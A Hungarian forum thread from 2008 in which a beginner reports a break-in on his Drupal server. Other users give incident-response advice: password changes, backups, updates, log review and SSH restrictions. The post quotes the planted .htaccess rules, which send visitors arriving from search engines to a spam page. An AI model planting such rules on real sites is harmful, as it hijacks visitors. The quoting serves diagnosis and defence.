ugrás a tartalomhoz

Segítség betörtek a Drupalomba

luzer_juzer · 2008. Jan. 20. (V), 19.31
Üdv Mindenki!

A következő történt velem. Néhány napja észrevettem hogy a drupal könyvtáramban létrejött egy könyvtár amiben ujabb két könyvtár van az egyikben egy fájl a rewritengine off-ra állítja
a másiban rewriterule- átírja ,hogy az eredeti oldalt redirektelje egy másik sitre
Aztán van még egy olyan amit az összes drupal könyvtáramba beír ami a .htaccess fájl (a tartalma alább)

RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]                                                                                                                                                                                                                    RewriteCond %{HTTP_REFERER}  [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=                                                                                                                                                                                                                      RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)                                                                                                        

RewriteCond %{TIME_SEC}                                                                                                  RewriteRule ^.*$ /new/ohamapi/ex3/t.htm [L]                              
                                                                                                           #a995d2cc661fa72452472e9554b5520c


Átírtam a jogokat meg minden beállítást amit tudtam, de gondolom valahogyan ez php-n keresztül éri el a szervert amit nem telejesen értek hogy hogyan lehet. Gondolom a php.ini-n van a rés és valahogy azt használva jön be.
Sajnos viszonylag kezdő vagyok ebben remélem tud valaki tanácsot adni hogyan lehetne 'lerázni' az újboli beírást és redirektelést.
A környezet amúgy debian sarge apache2-vel. Van webmin-es tűzfal és amit lehetett beállítottam mind ssh-n mind ftp-n hogy ne tudjanak bejönni illetéktelenek. :(

Minden segítséget köszönök
Luzer_Juzer
‹ Rewrite szabály, hogy minden kérést az index.php szolgáljon ki időzített php script futtatása avagy Cron lépésről-lépésre ›
 
1

ha betörtek

rrd · 2008. Jan. 20. (V), 20.33
Általában az alábbit csinálja az ember ha jól betörtek hozzá:

1. ftp, ssh, admin jelszavak módosítása azonnal lehetőleg valami gf4Zh57Dr szerűre, azaz megjegyezhetetlenre. Ezt érdemes a következő 3 hónapban kéthetente megtenni.
2. adatbázis kapcsolódási jelszó módosítása
3. adatbázis dump és weblap mentés helyi gépre (így van egy fix másolatod ami jól jöhet ha mondjuk a betörő elkezd esetleg törölgetni, és otthon kedvedre turkálhatsz további gyanús fileok után)
4. a használt cms (esetedben a drupal) frissítése a legrrissebb stabil változatra
5. a webszer gazdijának egy levél, hogy mi trötént és hol. Ő hozzáfér a logokhoz, lehet, hogy megtalálja, hogy ki volt, mikor és honnan. Neki is érdeke, mert lehet, hogy valami szerverbeállítás vagy bug okozza a biztonsági rést. Ha talál valamit akkor frissít a szerver oldalon mindent amit kell.
6. ha a rendszeredben vannak regisztrált userei akkor esetleg érdemes őket egy jelszómódosításra kényszeríteni. ha tárolsz érzékenyebb adatokat (pl hitelkártya azonosítókat) akkor mindenféleképpen ajánlatos ezt megtenni.

Ezután az ember rendszeresen figyel, hogy nem volt-e valamilyen behatolási kísérlet, vagy sikeres belépés.
2

Szerintem...

vbence · 2008. Jan. 20. (V), 20.45
Az ilyen "feltörések" 90%-a egy általad használt modul hibáját használja ki, amiben egy simert biztonsági rés van, így a PHP-n keresztül, annak jogaival futtathat kódot. Nézdd meg a változtatások idejét, és az apache access.log-ban keress fura kéréseket (meg persze az error logban is).

Ha te vagy a szerver ura, akkor nézd meg milyenusereknek van ssh elérése (csak azokat engedélyezd, akinek kell is). Egyes disztribúciók például alapból megengedik az összes usernek az ssh elérést. (Bővebben AllowGroups és AllowUsers az sshd.conf -ban)
4

valasz

luzer_juzer · 2008. Jan. 20. (V), 23.16
Nos köszönöm a segítséget nektek. A helyzet az hogy az ssh korlátozas tenyleg jo lenne de ezt meg ki kell szurnom hogy ki hasznalja es ki nem. A jelszo modositas a felhasznaloimnal nem lesz egyszeru mert legalabb 200 van. A szerver rendszeresen mentve van cronnal egy másik szerverre. Az biztos hogy korlátozom az ssh-t valahogy a groupokra. Az egyik felhasználó index.html fájlában volt egy csunya javascript és php amivel beírta magát oda ahová fentebb írtam. Ez alatt a felhasználó alatt ftp-ezet fel napota többször. A log jó ötlet volt bár én korábban már néztem mindent többször de most újra megnéztem őket és az auth logban találtam meg azt a furcsa szokását a usernek hogy hajnal háromkor ftp-zett aztán hatkor és így tovább.
Még 1x köszi a gyors válaszokat.

Üdv
Luzer_Juzer
5

JS?

janoszen · 2008. Jan. 21. (H), 11.08
Mi volt a pontos kód, amit beletett? Csak mert mint jeleztem, nekem is volt egy ilyen exploit, de nem az én oldalamon hanem egy másikon.
3

Kiváló szolgáltatók

janoszen · 2008. Jan. 20. (V), 22.46
Az is lehet, minden gyanusítgatás távol álljon tőlem, de volt ilyen tapasztalatom, hogy a kiváló szolgáltató rendkívül jól állította be a webszerverét és nem is nálad, hanem egy másik oldalon van a biztonsági hiba, amin keresztül be tudtak jutni.